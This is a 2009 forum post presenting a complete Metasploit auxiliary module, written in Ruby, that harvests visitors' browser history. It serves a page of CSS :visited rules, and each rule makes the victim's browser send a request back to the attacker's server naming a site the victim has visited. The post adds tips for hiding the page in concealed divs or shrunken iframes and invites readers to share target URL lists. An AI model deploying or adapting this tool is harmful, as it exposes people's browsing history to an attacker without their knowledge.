Saint_Patrick
Script Kiddie
Joined: 03 Apr 2005
Posts: 135
Location: Drifting
|
 Posted: Sun Feb 01, 2009 3:33 am Post subject: Stealing Browser History - New Metasploit Module |
 |
|
So, if you don't follow my tweets or blog, you might be interested in a new metasploit module that I've written for stealing browser history as PoC'd by RSnake.
There are couple of ways to perform this sort of recon. However, we are interested in an approach that does not utilize scripting.
| Code: | require 'msf/core'
class Metasploit3 < Msf::Auxiliary
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Browser History Harvester',
'Description' => %q{
This module creates a page containing CSS and HTML which will trigger GET requests
based on visited sites. This allows an attacker to obtain browser history information
without the use of scripting.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Saint Patrick <saintpatrick@l1pht.com>'
],
'Version' => '$Revision: 10 $',
'References' => [
['URL','http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/']
]
))
register_options(
[
OptPath.new('SITELIST', [ false, "The list of URLs that visits will be checked on",
File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "sites.txt")
])
], self.class)
end
def on_request_uri(cli, request)
tokenize = request.uri.split('?')
# Checking to see if this is an initial request or if we should print a host
if (tokenize.length > 1)
tokenize[1].chomp!('=')
print_status("#{cli.peerhost} visited: #{tokenize[1]}")
send_response(cli,"HTTP/1.1 404 Not Found\r\n")
else
print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
resp = build_page
send_response(cli,resp)
print_status("Sent page to #{cli.peerhost}")
return
end
end
def build_page
@sitecount = 0
page = %Q^<html>
<style>^
@list.each do |site|
next if site =~ /^#/
site.strip!
next if site.length == 0
page << "a:visited#link#{@sitecount}\n"
page << "{background:url('/#{@myuri}?#{site}');}\n"
@sitecount=@sitecount+1
end
page << "</style>"
@sitecount = 0
@list.each do |site|
next if site =~ /^#/
site.strip!
next if site.length == 0
page << "<a id=\"link#{@sitecount}\" href=\"http://#{site}\">#{site}</a><br/>"
@sitecount=@sitecount+1
end
page << "</html>"
return page
end
# Initialize all things holy
def run
@sitelist = datastore['SITELIST']
@myuri = datastore['URIPATH']
# Read here and use as gospel from here on out
@list = File.readlines(@sitelist)
exploit()
end
end
|
As you can see, we are basically creating a unique CSS style for every link. Each time a 'visited' fires, it makes a GET back to our metasploit server, where we handle/parse the value and throw it in the console. After which, we throw back a 404(sending a response keeps the browser from hanging and keeping info from us).
Of course you could stealth this up a bit by <div>'ing and styling to hidden, or <iframe>'ing and squeezing the area down. But I leave that up to you.
Interesting side effect: If your attack page is loaded in a tab of Firefox, and you visit one of the guessed url's in another tab, it will fire the style and metasploit will register the visit realtime. I'm assuming this is because FF rerenders styles on after any request? IE, not so much.
If you build interesting URL lists, please post them. 
_________________
"I suck at internet." |
|
FAQ
Search
Memberlist
Usergroups
Register
Profile
Log in to check your private messages
Log in
